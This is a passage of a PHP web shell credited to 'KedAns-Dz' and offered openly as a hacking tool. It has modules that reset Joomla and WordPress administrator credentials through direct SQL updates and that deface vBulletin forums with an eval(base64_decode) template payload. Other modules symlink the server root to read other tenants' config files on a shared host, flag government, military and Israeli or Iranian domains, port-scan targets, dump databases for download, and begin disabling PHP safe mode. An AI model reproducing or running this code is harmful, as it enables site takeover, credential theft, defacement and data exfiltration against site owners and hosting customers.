  1577.         preg_match_all('(<div class="sb_tlst">.*<h3>.*<a href="(.*)".*>(.*)</a>.*</h3>.*</div>)siU', $x, $findlink);
  1578.        
  1579.         foreach ($findlink[1] as $fl)
  1580.        
  1581.         $allLinks[]=sec($fl);
  1582.        
  1583.        
  1584.         $npage = $npage + 10;
  1585.        
  1586.         if (preg_match('(first=' . $npage . '&amp)siU', $x, $linksuiv) == 0)
  1587.             break;             
  1588.     }
  1589.    
  1590.     else
  1591.         break;
  1592.   }
  1593.  
  1594.  
  1595. $allDmns = array();
  1596.  
  1597. foreach ($allLinks as $kk => $vv){
  1598.  
  1599. $allDmns[] = $vv;
  1600. }
  1601.            
  1602. echo'<table border="1"  width=\"80%\" align=\"center\">
  1603. <tr><td width=\"30%\"><b>Server IP&nbsp;&nbsp;&nbsp;&nbsp; : </b></td><td><b>'.$ip.'</b></td></tr>         
  1604. <tr><td width=\"30%\"><b>Sites Found&nbsp; : </b></td><td><b>'.count(array_unique($allDmns)).'</b></td></tr>
  1605. </table>';
  1606. echo "<br><br>";
  1607.  
  1608. echo'<table border="1" width="80%" align=\"center\">';
  1609.  
  1610. foreach(array_unique($allDmns) as $h3h3){
  1611.  
  1612. echo'<tr id=new><td><b><a href='.$h3h3.'>'.$h3h3.'</a></b></td><td><b>PacketStorm</b></td><td><b>Challenge of Exploiting ..!</b></td></tr>';
  1613.  
  1614. check_com($h3h3);
  1615. get_plugins($h3h3);
  1616. get_numod($h3h3);
  1617. get_xoomod($h3h3);
  1618. }
  1619.  
  1620. echo"</table>";
  1621.  
  1622. }
  1623.  
  1624. echo "</center>
  1625. <br><p align='center'>
  1626. Coded By : <a href='http://facebook.com/KedAns'>KedAns-Dz</a> | <a href='http://1337day.com/'>Inj3ct0r 1337day Exploit Database</a><br>
  1627. Made in Algeria | CopyCenter (^.^) 2o12
  1628. </p>
  1629. </body>
  1630. </html>";
  1631. }
  1632.  
  1633.  
  1634. elseif(isset($_GET['x']) && ($_GET['x'] == 'jm-reset'))
  1635. {
  1636. ?>
  1637. <form action="?y=<?php echo $pwd; ?>&amp;x=jm-reset" method="post">
  1638.  
  1639. <?php
  1640.  
  1641. @error_reporting(0);
  1642. @ini_set('error_log',NULL);
  1643. echo '
  1644. <div class="com">
  1645. <form method="post">
  1646. <center><br><br><table border="1" bordercolor="#FFFFFF" width="400" cellpadding="1" cellspacing="1">
  1647. <br />
  1648. <tr>
  1649.     <td>Host :</td>
  1650.     <td><input type="text" style="color:#FF0000;background-color:#000000" name="host" value="localhost" /></td>
  1651. </tr>
  1652. <tr>
  1653.     <td>user :</td>
  1654.     <td><input type="text" style="color:#FF0000;background-color:#000000" name="user" /></td>
  1655. </tr>
  1656. <tr>
  1657.     <td>Pass :</td><td><input style="color:#FF0000;background-color:#000000" type="text" name="pass"/></td>
  1658. </tr>
  1659. <tr>
  1660.     <td>db :</td>
  1661.     <td><input type="text" style="color:#FF0000;background-color:#000000" name="db" /></td>
  1662. </tr>
  1663. <tr>
  1664.     <td>dbprefix :</td>
  1665.     <td><input type="text" style="color:#FF0000;background-color:#000000" name="jop" value="jos_users" /></td>
  1666. </tr>
  1667. <tr>
  1668.     <td>Admin User :</td>
  1669.     <td><input type="text" style="color:#FF0000;background-color:#000000" name="users" value="useradmin" /></td>
  1670. </tr>
  1671. <tr>
  1672.     <td>Admin Password :</td>
  1673.     <td><input type="text" style="color:#FF0000;background-color:#000000" name="passwd" value="passadmin" /></td>
  1674. </tr>
  1675. <tr>
  1676.      <td colspan="6" align="center" style="color:#FF0000;background-color:#000000" width="70%"> <input type="submit" value="SQL" style="color:#FF0000;background-color:#000000" maxlength="30" />  <input type="reset" value="clear" style="color:#FF0000;background-color:#000000" maxlength="30" /> </td>
  1677.  
  1678. </tr>
  1679.  </table>
  1680. </form> </div></center>';
  1681.  
  1682. $host   = $_POST['host'];
  1683. $user   = $_POST['user'];
  1684. $pass   = $_POST['pass'];
  1685. $db     = $_POST['db'];
  1686. $jop    = $_POST['jop'];
  1687. $users   = $_POST['users'];
  1688. $admpas = $_POST['passwd'];
  1689.  
  1690. function joomlahash($password) {
  1691.     $random = rand();
  1692.     $string = md5("$random");
  1693.     $yourpassword = "$password";
  1694.     $random32 = "$string";
  1695.     $join = "$password$random32";
  1696.     $md5 = md5("$join");
  1697.     $jomlaahash = "$md5:$random32";
  1698.     return $jomlaahash;
  1699. }
  1700.  
  1701. if(isset($host) ) {
  1702. $con =@ mysql_connect($host,$user,$pass) or die ;
  1703. $cond =@ mysql_select_db($db) or die;
  1704.  
  1705. $query =@mysql_query("UPDATE $jop SET username ='".$users."' WHERE usertype = Super Administrator");
  1706. $query =@mysql_query("UPDATE $jop SET password ='".joomlahash($admpas)."' WHERE usertype = Super Administrator");
  1707. $query =@mysql_query("UPDATE $jop SET username ='".$users."' WHERE usertype = deprecated");
  1708. $query =@mysql_query("UPDATE $jop SET password ='".joomlahash($admpas)."' WHERE usertype = deprecated");
  1709.  
  1710. }else{
  1711.   echo "<center><br /><div class='com'>Enter the database !<br /><br /></div></center>";
  1712. }
  1713. }
  1714.    
  1715. elseif(isset($_GET['x']) && ($_GET['x'] == 'wp-reset'))
  1716. {  
  1717. ?>
  1718. <form action="?y=<?php echo $pwd; ?>&amp;x=wp-reset" method="post">
  1719.  
  1720. <?php
  1721.  
  1722. @error_reporting(0);
  1723. @ini_set('error_log',NULL);
  1724.   echo '
  1725. <div class="com">
  1726. <form method="post">
  1727. <center><br><br><table border="1" bordercolor="#FFFFFF" width="400" cellpadding="1" cellspacing="1">
  1728. <br />
  1729.  
  1730. <tr>
  1731.     <td>Host :</td>
  1732.     <td><input type="text" name="host" style="color:#FF0000;background-color:#000000" value="localhost" /></td>
  1733. </tr>
  1734.  
  1735. <tr>
  1736.     <td>user :</td>
  1737.     <td><input type="text" style="color:#FF0000;background-color:#000000" name="user" /></td>
  1738. </tr>
  1739. <tr>
  1740.     <td>Pass :</td><td><input type="text" style="color:#FF0000;background-color:#000000" name="pass"/></td>
  1741. </tr>
  1742. <tr>
  1743.     <td>db :</td>
  1744.     <td><input type="text" style="color:#FF0000;background-color:#000000" name="db" /></td>
  1745. </tr>
  1746. <tr>
  1747.     <td>user admin :</td>
  1748.     <td><input type="text" style="color:#FF0000;background-color:#000000" name="useradmin" value="admin" /></td>
  1749. </tr>
  1750. <tr>
  1751.     <td>pass admin :</td>
  1752.     <td><input type="text" style="color:#FF0000;background-color:#000000" name="passadmin" value="admin"/></td>
  1753. </tr>
  1754. <tr>
  1755.      <td colspan="6" align="center" width="70%"> <input type="submit" style="color:#FF0000;background-color:#000000" value="SQL" maxlength="30" />  <input type="reset" value="clear" style="color:#FF0000;background-color:#000000" maxlength="30" /> </td>
  1756.  
  1757. </tr>
  1758.  </table>
  1759. </form> </div></center>';
  1760.  
  1761. $host       = $_POST['host'];
  1762. $user       = $_POST['user'];
  1763. $pass       = $_POST['pass'];
  1764. $db         = $_POST['db'];
  1765. $useradmin  = $_POST['useradmin'];
  1766. $pass_ad    = $_POST['passadmin'];
  1767.  
  1768. if(isset($host) ) {
  1769. $con =@ mysql_connect($host,$user,$pass) or die ;
  1770. $sedb =@ mysql_select_db($db) or die;
  1771. $crypt = crypt($pass_ad);
  1772. $query =@mysql_query("UPDATE `wp_users` SET `user_login` ='".$useradmin."' WHERE ID = 1") or die('Cant Update ID Number 1');
  1773. $query =@mysql_query("UPDATE `wp_users` SET `user_pass` ='".$crypt."' WHERE ID = 1") or die('Cant Update ID Number 1');
  1774. if ($query)
  1775. {
  1776.   echo "<center><br /><div class='com'>Queried !<br /><br /></div></center>";
  1777. }
  1778. else if (!$query)
  1779. {
  1780.   echo "error";
  1781. }
  1782.  
  1783. }else
  1784. {
  1785.   echo "<center><br /><div class='com'>Enter the database !<br /><br /></div></center>";
  1786. }
  1787. }
  1788.    
  1789.    
  1790. elseif(isset($_GET['x']) && ($_GET['x'] == 'web-info'))
  1791. {  
  1792. ?>
  1793. <form action="?y=<?php echo $pwd; ?>&amp;x=web-info" method="post">
  1794.  
  1795.  
  1796. <?php
  1797. @set_time_limit(0);
  1798. @error_reporting(0);
  1799.  
  1800. function sws_domain_info($site)
  1801. {
  1802. $getip = @file_get_contents("http://networktools.nl/whois/$site");
  1803. flush();
  1804. $ip    = @findit($getip,'<pre>','</pre>');
  1805.  
  1806. return $ip;
  1807. flush();
  1808. }
  1809.  
  1810.  
  1811. function sws_net_info($site)
  1812. {
  1813. $getip = @file_get_contents("http://networktools.nl/asinfo/$site");
  1814. $ip    = @findit($getip,'<pre>','</pre>');
  1815.  
  1816. return $ip;
  1817. flush();
  1818. }
  1819.  
  1820. function sws_site_ser($site)
  1821. {
  1822. $getip = @file_get_contents("http://networktools.nl/reverseip/$site");
  1823. $ip    = @findit($getip,'<pre>','</pre>');
  1824.  
  1825. return $ip;
  1826. flush();
  1827. }
  1828.  
  1829. function sws_sup_dom($site)
  1830. {
  1831. $getip = @file_get_contents("http://www.magic-net.info/dns-and-ip-tools.dnslookup?subd=".$site."&Search+subdomains=Find+subdomains");
  1832. $ip    = @findit($getip,'<strong>Nameservers found:</strong>','<script type="text/javascript">');
  1833.  
  1834. return $ip;
  1835. flush();
  1836. }
  1837.  
  1838. function sws_port_scan($ip)
  1839. {
  1840.  
  1841. $list_post = array('80','21','22','2082','25','53','110','443','143');
  1842.  
  1843. foreach ($list_post as $o_port)
  1844. {
  1845. $connect = @fsockopen($ip,$o_port,$errno,$errstr,5);
  1846.  
  1847.            if($connect)
  1848.            {
  1849.            echo " $ip : $o_port    &nbsp;&nbsp;&nbsp; <u style=\"color: #009900\">Open</u> <br /><br />";
  1850.            flush();
  1851.            }
  1852. }
  1853.  
  1854. }
  1855.  
  1856. function findit($mytext,$starttag,$endtag) {
  1857.  $posLeft  = @stripos($mytext,$starttag)+strlen($starttag);
  1858.  $posRight = @stripos($mytext,$endtag,$posLeft+1);
  1859.  return  @substr($mytext,$posLeft,$posRight-$posLeft);
  1860.  flush();
  1861. }
  1862.  
  1863. echo '<br><br><center>';
  1864.  
  1865.  
  1866. echo '
  1867. <br />
  1868. <div class="sc"><form method="post">
  1869. Site to scan : <input type="text" name="site" size="30" style="color:#FF0000;background-color:#000000" value="site.com"   /> &nbsp;&nbsp <input type="submit" style="color:#FF0000;background-color:#000000" name="scan" value="Scan !"  />
  1870. </form></div>';
  1871.  
  1872.  
  1873. if(isset($_POST['scan']))
  1874. {
  1875.  
  1876.  
  1877.  
  1878.  
  1879. $site =  @htmlentities($_POST['site']);
  1880.                  if (empty($site)){die('<br /><br /> Not add IP .. !');}
  1881.  
  1882. $ip_port = @gethostbyname($site);
  1883.  
  1884. echo "
  1885.  
  1886.  
  1887.  
  1888.  
  1889.  
  1890. <br /><div class=\"sc2\">Scanning [ $site ip $ip_port ] ... </div>
  1891.  
  1892. <div class=\"tit\"> <br /><br />|-------------- Port Server ------------------| <br /></div>
  1893. <div class=\"ru\"> <br /><br /><pre>
  1894. ";
  1895. echo "".sws_port_scan($ip_port)." </pre></div> ";
  1896.  
  1897. flush();
  1898.  
  1899.  
  1900.  
  1901. echo "<div class=\"tit\"><br /><br />|-------------- Domain Info ------------------| <br /> </div>
  1902. <div class=\"ru\">
  1903. <pre>".sws_domain_info($site)."</pre></div>";
  1904. flush();
  1905.  
  1906. echo "
  1907. <div class=\"tit\"> <br /><br />|-------------- Network Info ------------------| <br /></div>
  1908. <div class=\"ru\">
  1909. <pre>".sws_net_info($site)."</pre> </div>";
  1910. flush();
  1911.  
  1912. echo "<div class=\"tit\"> <br /><br />|-------------- subdomains Server ------------------| <br /></div>
  1913. <div class=\"ru\">
  1914. <pre>".sws_sup_dom($site)."</pre> </div>";
  1915. flush();
  1916.  
  1917.  
  1918. echo "<div class=\"tit\"> <br /><br />|-------------- Site Server ------------------| <br /></div>
  1919. <div class=\"ru\">
  1920. <pre>".sws_site_ser($site)."</pre> </div>
  1921. <div class=\"tit\"> <br /><br />|-------------- END ------------------| <br /></div>";
  1922. flush();
  1923.  
  1924.  
  1925.  
  1926.  
  1927.  
  1928. }
  1929.  
  1930. echo '</center>';
  1931. }
  1932.    
  1933. elseif(isset($_GET['x']) && ($_GET['x'] == 'identify'))
  1934. {  
  1935. ?>
  1936. <form action="?y=<?php echo $pwd; ?>&amp;x=identify" method="post">
  1937.  
  1938. <?php
  1939.  
  1940. echo "<center><br><br>
  1941. <font style=\"color:#FF0000\">This function is used to identify some CMS on all website in this server</font><br>
  1942. <font style=\"color:#FF0000\">may take very long time and this shell gonna lag, if you want to continue, press \"Check Now\" button</font><br><br>
  1943. <form type=post>
  1944. <input type='submit' style=\"color:#FF0000\" value='Check Now' name='checkingstart'>
  1945. </form></center>";
  1946.  
  1947. if (isset($_POST['checkingstart'])) {
  1948.  
  1949. echo "<center>";
  1950.  
  1951. $WebUrl = 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
  1952. $Explode=explode('/',$WebUrl );
  1953. $WebUrl =str_replace($Explode[count($Explode)-1],'',$WebUrl );
  1954.  
  1955.  
  1956. @mkdir('sym',0777);
  1957. $htaccess  = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
  1958. $write =@fopen ('sym/.htaccess','w');
  1959. fwrite($write ,$htaccess);
  1960. @symlink('/','sym/root');
  1961. $filelocation = basename(__FILE__);
  1962.  
  1963. $read_named_conf = @file('/etc/named.conf');
  1964. if(!$read_named_conf)
  1965. {
  1966. die (" can't read /etc/named.conf,Please use <a href='?vvip=sytc'>/etc Symlink</a>");
  1967. }
  1968. $new12 = explode (', ', $dis_func);
  1969. if (in_array('posix_getpwuid', $new12)){die('<center><b># posix_getpwuid is Not Supported</b></center>');}
  1970. else
  1971. {
  1972. echo "<div class='tmp'>
  1973. <table border='1' bordercolor='#FF0000' width='500' cellpadding='1' cellspacing='0'><td> Domains </td><td> Script </td>";
  1974. foreach($read_named_conf as $subject){
  1975. if(eregi('zone',$subject)){
  1976. preg_match_all('#zone "(.*)"#',$subject,$string);
  1977. flush();
  1978. if(strlen(trim($string[1][0])) >2){
  1979. $UID = posix_getpwuid(@fileowner('/etc/valiases/'.$string[1][0]));
  1980. $Wordpress=$WebUrl.'/sym/root/home/'.$UID['name'].'/public_html/wp-config.php';
  1981. $wp=get_headers($Wordpress);
  1982. $haystackwp=$wp[0];
  1983. $Wordpress2=$WebUrl.'/sym/root/home/'.$UID['name'].'/public_html/blog/wp-config.php';
  1984. $wp2=get_headers($Wordpress2);
  1985. $haystackwp2=$wp2[0];
  1986. $Joomla=$WebUrl.'/sym/root/home/'.$UID['name'].'/public_html/configuration.php';
  1987. $jmla=get_headers($Joomla);
  1988. $haystackjmla=$jmla[0];
  1989. $Joomla2=$WebUrl.'/sym/root/home/'.$UID['name'].'/public_html/joomla/configuration.php';
  1990. $jmla2=get_headers($Joomla2);
  1991. $haystackjmla2=$jmla2[0];
  1992. $Vbulletin=$WebUrl.'/sym/root/home/'.$UID['name'].'/public_html/includes/config.php';
  1993. $vb=get_headers($Vbulletin);
  1994. $haystackvb=$vb[0];
  1995. $Vbulletin3=$WebUrl.'/sym/root/home/'.$UID['name'].'/public_html/vb/includes/config.php';
  1996. $vb3=get_headers($Vbulletin3);
  1997. $haystackvb2=$vb3[0];
  1998. $Vbulletin5=$WebUrl.'/sym/root/home/'.$UID['name'].'/public_html/forum/includes/config.php';
  1999. $vb5=get_headers($Vbulletin5);
  2000. $haystackvb5=$vb5[0];
  2001. $whmcs1=$WebUrl.'/sym/root/home/'.$UID['name'].'public_html/clients/configuration.php';
  2002. $whm=get_headers($whmcs1);
  2003. $haystackwhm=$whm[0];
  2004. $whmcs1=$WebUrl.'/sym/root/home/'.$UID['name'].'/public_html/support/configuration.php';
  2005. $whm=get_headers($whmcs1);
  2006. $haystackwhm=$whm[0];
  2007. $whmcs2=$WebUrl.'/sym/root/home/'.$UID['name'].'/public_html/client/configuration.php';
  2008. $whm2=get_headers($whmcs2);
  2009. $haystackwhm2=$whm2[0];
  2010. $whmcs3=$WebUrl.'/sym/root/home/'.$UID['name'].'/public_html/submitticket.php';
  2011. $whm3=get_headers($whmcs3);
  2012. $haystackwhm3=$whm3[0];
  2013. $whmcs4=$WebUrl.'/sym/root/home/'.$UID['name'].'/public_html/client/configuration.php';
  2014. $whm4=get_headers($whmcs4);
  2015. $haystackwhm=$whm4[0];
  2016. $Websitez = strpos($haystackwp,'200');
  2017. $Websitez='&nbsp;';
  2018. if (strpos($haystackwp,'200') == true )
  2019. {
  2020. $Websitez="<a href='".$Wordpress."' target='_blank'>Wordpress</a>";
  2021. }
  2022. elseif (strpos($haystackwp2,'200') == true)
  2023. {
  2024. $Websitez="<a href='".$Wordpress2."' target='_blank'>Wordpress</a>";
  2025. }
  2026. elseif (strpos($haystackjmla,'200')  == true and strpos($haystackwhm3,'200')  == true )
  2027. {
  2028. $Websitez=" <a href='".$whmcs3."' target='_blank'>WHMCS</a>";
  2029. }
  2030. elseif (strpos($haystackwhm,'200')  == true)
  2031. {
  2032. $Websitez =" <a href='".$whmcs1."' target='_blank'>WHMCS</a>";
  2033. }
  2034. elseif (strpos($haystackwhm2,'200')  == true)
  2035. {
  2036. $Websitez =" <a href='".$whmcs2."' target='_blank'>WHMCS</a>";
  2037. }
  2038. elseif (strpos($haystackjmla,'200')  == true)
  2039. {
  2040. $Websitez=" <a href='".$Joomla."' target='_blank'>Joomla</a>";
  2041. }
  2042. elseif (strpos($haystackjmla2,'200')  == true)
  2043. {
  2044. $Websitez=" <a href='".$Joomla2."' target='_blank'>Joomla</a>";
  2045. }
  2046. elseif (strpos($haystackvb,'200')  == true)
  2047. {
  2048. $Websitez=" <a href='".$Vbulletin."' target='_blank'>vBulletin</a>";
  2049. }
  2050. elseif (strpos($haystackvb2,'200')  == true)
  2051. {
  2052. $Websitez=" <a href='".$Vbulletin3."' target='_blank'>vBulletin</a>";
  2053. }
  2054. elseif (strpos($Vbulletin4,'200')  == true)
  2055. {
  2056. $Websitez=" <a href='".$Vbulletin5."' target='_blank'>vBulletin</a>";
  2057. }
  2058. else
  2059. {
  2060. continue;
  2061. }
  2062. $name = $UID['name'] ;
  2063. echo '<tr><td><a href=http://www.'.$string[1][0].'/>'.$string[1][0].'</a></td>
  2064. <td>'.$Websitez.'</td></tr></center>';
  2065. flush();
  2066. }
  2067. }
  2068. }
  2069. }
  2070. }
  2071. }
  2072.  
  2073. elseif(isset($_GET['x']) && ($_GET['x'] == 'vb'))
  2074. {  
  2075. ?>
  2076. <form action="?y=<?php echo $pwd; ?>&amp;x=vb" method="post">
  2077.  
  2078. <br><br><br><div align="center">
  2079. <H2><span style="font-weight: 400"><font face="Trebuchet MS" size="4">
  2080. <font color="#00FF00">&nbsp;vB Index Changer</font><font color="#FF0000">
  2081. <font face="Tahoma">! Change All Pages For Forum !&nbsp;
  2082. <br></font></div><br>
  2083.  
  2084. <?
  2085.  
  2086. if(empty($_POST['index'])){
  2087. echo "<center><FORM method=\"POST\">
  2088. host : <INPUT size=\"15\" value=\"localhost\" style='color:#FF0000;background-color:#000000' name=\"localhost\" type=\"text\">
  2089. database : <INPUT size=\"15\" style='color:#FF0000;background-color:#000000' value=\"forum_vb\" name=\"database\" type=\"text\"><br>
  2090. username : <INPUT size=\"15\" style='color:#FF0000;background-color:#000000' value=\"forum_vb\" name=\"username\" type=\"text\">
  2091. password : <INPUT size=\"15\" style='color:#FF0000;background-color:#000000' value=\"vb\" name=\"password\" type=\"text\"><br>
  2092. <br>
  2093. <textarea name=\"index\" cols=\"70\" rows=\"30\">Set Your Index</textarea><br>
  2094. <INPUT value=\"Set\" style='color:#FF0000;background-color:#000000' name=\"send\" type=\"submit\">
  2095. </FORM></center>";
  2096. }else{
  2097. $localhost = $_POST['localhost'];
  2098. $database = $_POST['database'];
  2099. $username = $_POST['username'];
  2100. $password = $_POST['password'];
  2101. $index = $_POST['index'];
  2102. @mysql_connect($localhost,$username,$password) or die(mysql_error());
  2103. @mysql_select_db($database) or die(mysql_error());
  2104.  
  2105. $index=str_replace("\'","'",$index);
  2106.  
  2107. $set_index = "{\${eval(base64_decode(\'";
  2108.  
  2109. $set_index .= base64_encode("echo \"$index\";");
  2110.  
  2111.  
  2112. $set_index .= "\'))}}{\${exit()}}</textarea>";
  2113.  
  2114. echo("UPDATE template SET template ='".$set_index."' ") ;
  2115. $ok=@mysql_query("UPDATE template SET template ='".$set_index."'") or die(mysql_error());
  2116.  
  2117. if($ok){
  2118. echo "!! update finish !!<br><br>";
  2119. }
  2120.  
  2121. }
  2122. # Footer
  2123. }
  2124.    
  2125.    
  2126. elseif(isset($_GET['x']) && ($_GET['x'] == 'symlink'))
  2127. {  
  2128. ?>
  2129. <form action="?y=<?php echo $pwd; ?>&amp;x=symlink" method="post">
  2130.  
  2131. <?php  
  2132.  
  2133. @set_time_limit(0);
  2134.  
  2135. echo "<center>";
  2136.  
  2137. @mkdir('sym',0777);
  2138. $htaccess  = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
  2139. $write =@fopen ('sym/.htaccess','w');
  2140. fwrite($write ,$htaccess);
  2141. @symlink('/','sym/root');
  2142. $filelocation = basename(__FILE__);
  2143. $read_named_conf = @file('/etc/named.conf');
  2144. if(!$read_named_conf)
  2145. {
  2146. echo "<pre class=ml1 style='margin-top:5px'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>";
  2147. }
  2148. else
  2149. {
  2150. echo "<br><br><div class='tmp'><table border='1' bordercolor='#FF0000' width='500' cellpadding='1' cellspacing='0'><td>Domains</td><td>Users</td><td>symlink </td>";
  2151. foreach($read_named_conf as $subject){
  2152. if(eregi('zone',$subject)){
  2153. preg_match_all('#zone "(.*)"#',$subject,$string);
  2154. flush();
  2155. if(strlen(trim($string[1][0])) >2){
  2156. $UID = posix_getpwuid(@fileowner('/etc/valiases/'.$string[1][0]));
  2157. $name = $UID['name'] ;
  2158. @symlink('/','sym/root');
  2159. $name   = $string[1][0];
  2160. $iran   = '\.ir';
  2161. $israel = '\.il';
  2162. $indo   = '\.id';
  2163. $sg12   = '\.sg';
  2164. $edu    = '\.edu';
  2165. $gov    = '\.gov';
  2166. $gose   = '\.go';
  2167. $gober  = '\.gob';
  2168. $mil1   = '\.mil';
  2169. $mil2   = '\.mi';
  2170. if (eregi("$iran",$string[1][0]) or eregi("$israel",$string[1][0]) or eregi("$indo",$string[1][0])or eregi("$sg12",$string[1][0]) or eregi ("$edu",$string[1][0]) or eregi ("$gov",$string[1][0])
  2171. or eregi ("$gose",$string[1][0]) or eregi("$gober",$string[1][0]) or eregi("$mil1",$string[1][0]) or eregi ("$mil2",$string[1][0]))
  2172. {
  2173. $name = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px red; '>".$string[1][0].'</div>';
  2174. }
  2175. echo "
  2176. <tr>
  2177.  
  2178. <td>
  2179. <div class='dom'><a target='_blank' href=http://www.".$string[1][0].'/>'.$name.' </a> </div>
  2180. </td>
  2181.  
  2182. <td>
  2183. '.$UID['name']."
  2184. </td>
  2185.  
  2186. <td>
  2187. <a href='sym/root/home/".$UID['name']."/public_html' target='_blank'>Symlink </a>
  2188. </td>
  2189.  
  2190. </tr></div> ";
  2191. flush();
  2192. }
  2193. }
  2194. }
  2195. }
  2196.  
  2197. echo "</center></table>";  
  2198.  
  2199. }
  2200.  
  2201. elseif(isset($_GET['x']) && ($_GET['x'] == 'mysqlbackup'))
  2202. {  
  2203. ?>
  2204. <form action="?y=<?php echo $pwd; ?>&amp;x=mysqlbackup" method="post">
  2205.  
  2206. <?php
  2207.  
  2208. echo '<center><br><br><br>
  2209. <table border=1 width=400 style="border-collapse: collapse" cellpadding=2>
  2210. <tr>
  2211. <td width=400 colspan=2 style=\'color:#FF0000;background-color:#000000\'><p align=center>
  2212. <b><font face=Arial size=2 style=\'color:#FF0000;background-color:#000000\'>Backup Database</font></b>
  2213. </td></tr>
  2214. <tr>
  2215. <td width=150 style=\'color:#FF0000;background-color:#000000\'>
  2216. <font face=Arial style=\'color:#FF0000;background-color:#000000\' size=2>DB Type:</font></td>
  2217. <td width=250 style=\'color:#FF0000;background-color:#000000\'>
  2218. <form method=post action="'.$me.'">
  2219. <select style=\'color:#FF0000;background-color:#000000\' name=method>
  2220. <option value="gzip">Gzip</option>
  2221. <option value="sql">Sql</option>
  2222. </select></td></tr>
  2223. <tr>
  2224. <td width=150 style=\'color:#FF0000;background-color:#000000\'>
  2225. <font face=Arial style=\'color:#FF0000;background-color:#000000\' size=2>Server:</font>
  2226. </td>
  2227. <td width=250 style=\'color:#FF0000;background-color:#000000\'>
  2228. <input type=text name=server style=\'color:#FF0000;background-color:#000000\' value=localhost size=35>
  2229. </td></tr>
  2230. <tr>
  2231. <td width=150 style=\'color:#FF0000;background-color:#000000\'><font face=Arial style=\'color:#FF0000;background-color:#000000\' size=2>Username:</font></td>
  2232. <td width=250 style=\'color:#FF0000;background-color:#000000\'><input style=\'color:#FF0000;background-color:#000000\' type=text name=username size=35></td>
  2233. </tr>
  2234. <tr>
  2235. <td width=150 style=\'color:#FF0000;background-color:#000000\'><font face=Arial style=\'color:#FF0000;background-color:#000000\' size=2>Password:</font></td>
  2236. <td width=250 style=\'color:#FF0000;background-color:#000000\'><input style=\'color:#FF0000;background-color:#000000\' type=text name=password></td>
  2237. </tr>
  2238. <tr>
  2239. <td width=150 style=\'color:#FF0000;background-color:#000000\'><font face=Arial style=\'color:#FF0000;background-color:#000000\' size=2>Data Base Name:</font></td>
  2240. <td width=250 style=\'color:#FF0000;background-color:#000000\'><input style=\'color:#FF0000;background-color:#000000\' type=text name=dbname></td>
  2241. </tr>
  2242. <tr>
  2243. <td width=400 colspan=2 style=\'color:#FF0000;background-color:#000000\'><center><input style=\'color:#FF0000;background-color:#000000\' type=submit value="  Dump!  " ></td>
  2244. </tr>
  2245. </table></form></center></table>';
  2246. if ($_POST['username'] && $_POST['dbname'] && $_POST['method']){
  2247. $date = date("Y-m-d");
  2248. $dbserver = $_POST['server'];
  2249. $dbuser = $_POST['username'];
  2250. $dbpass = $_POST['password'];
  2251. $dbname = $_POST['dbname'];
  2252. $file = "Dump-$dbname-$date";
  2253. $method = $_POST['method'];
  2254. if ($method=='sql'){
  2255. $file="Dump-$dbname-$date.sql";
  2256. $fp=fopen($file,"w");
  2257. }else{
  2258. $file="Dump-$dbname-$date.sql.gz";
  2259. $fp = gzopen($file,"w");
  2260. }
  2261. function write($data) {
  2262. global $fp;
  2263. if ($_POST['method']=='sql'){
  2264. fwrite($fp,$data);
  2265. }else{
  2266. gzwrite($fp, $data);
  2267. }}
  2268.  
  2269. function filesize_n($path)
  2270. {
  2271.         $size = @filesize($path);
  2272.         if( $size < 0 ){
  2273.             ob_start();
  2274.             system('ls -al "'.$path.'" | awk \'BEGIN {FS=" "}{print $5}\'');
  2275.             $size = ob_get_clean();
  2276.         }
  2277.  
  2278.         return $size;
  2279. }
  2280. function format_size($size) {
  2281.       $sizes = array(" Bytes", " KB", " MB", " GB", " TB", " PB", " EB", " ZB", " YB");
  2282.       if ($size == 0) { return('n/a'); } else {
  2283.       return (round($size/pow(1024, ($i = floor(log($size, 1024)))), $i > 1 ? 2 : 0) . $sizes[$i]); }
  2284. }
  2285. mysql_connect ($dbserver, $dbuser, $dbpass);
  2286. mysql_select_db($dbname);
  2287. $tables = mysql_query ("SHOW TABLES");
  2288. while ($i = mysql_fetch_array($tables)) {
  2289.     $i = $i['Tables_in_'.$dbname];
  2290.     $create = mysql_fetch_array(mysql_query ("SHOW CREATE TABLE ".$i));
  2291.     write($create['Create Table'].";\n\n");
  2292.     $sql = mysql_query ("SELECT * FROM ".$i);
  2293.     if (mysql_num_rows($sql)) {
  2294.         while ($row = mysql_fetch_row($sql)) {
  2295.             foreach ($row as $j => $k) {
  2296.                 $row[$j] = "'".mysql_escape_string($k)."'";
  2297.             }
  2298.             write("INSERT INTO $i VALUES(".implode(",", $row).");\n");
  2299.         }
  2300.     }
  2301. }
  2302. if ($method=='sql'){
  2303. fclose ($fp);
  2304. }else{
  2305. gzclose($fp);}
  2306. $sizedatabasefile = filesize_n($file);
  2307. $sizehumanreadable = format_size($sizedatabasefile);
  2308. echo "<br><br>
  2309. <center><font color='#FF0000'>Download Database -&#62; </font>
  2310. <a href='$file'>Here</a>
  2311. <font color='#FF0000'> | DatabaseFileSize -&#62; $sizehumanreadable </font></center>";
  2312. flush();
  2313. }
  2314. }
  2315.  
  2316. elseif(isset($_GET['x']) && ($_GET['x'] == 'security-mode'))
  2317. {  
  2318. ?>
  2319. <form action="?y=<?php echo $pwd; ?>&amp;x=security-mode" method="post">
  2320.  
  2321. <?php
  2322.  
  2323. echo "<html>
  2324. <center><br><br><br>
  2325. <font color=#FF0000 > Disable SafeMode and Clear Disable Function using php.ini </font><br>
  2326. <form method='POST' >
  2327. <font color=#FF0000 > Path to Disable : </font><input type='text' name='phpinisafemode' value='$pwd' style='color:#FF0000;background-color:#000000' /><br>
  2328. <input type='submit' name='dsmsubmit' style='color:#FF0000;background-color:#000000' value='Create PHP.INI' />
  2329. </form>
  2330. <br><br>
  2331. <font color=#FF0000 > Disable SafeMode and Clear Disable Function using Htaccess </font><br>
  2332. <form method='POST' >
  2333. <font color=#FF0000 > Path to Disable : </font><input type='text' name='htaccesssafemode' style='color:#FF0000;background-color:#000000' value='$pwd' /><br>
  2334. <input type='submit' name='omssubmit' style='color:#FF0000;background-color:#000000' value='Create .HTACCESS' />
  2335. </form>";
  2336.  
  2337. $dirphpini = $_POST['phpinisafemode'];
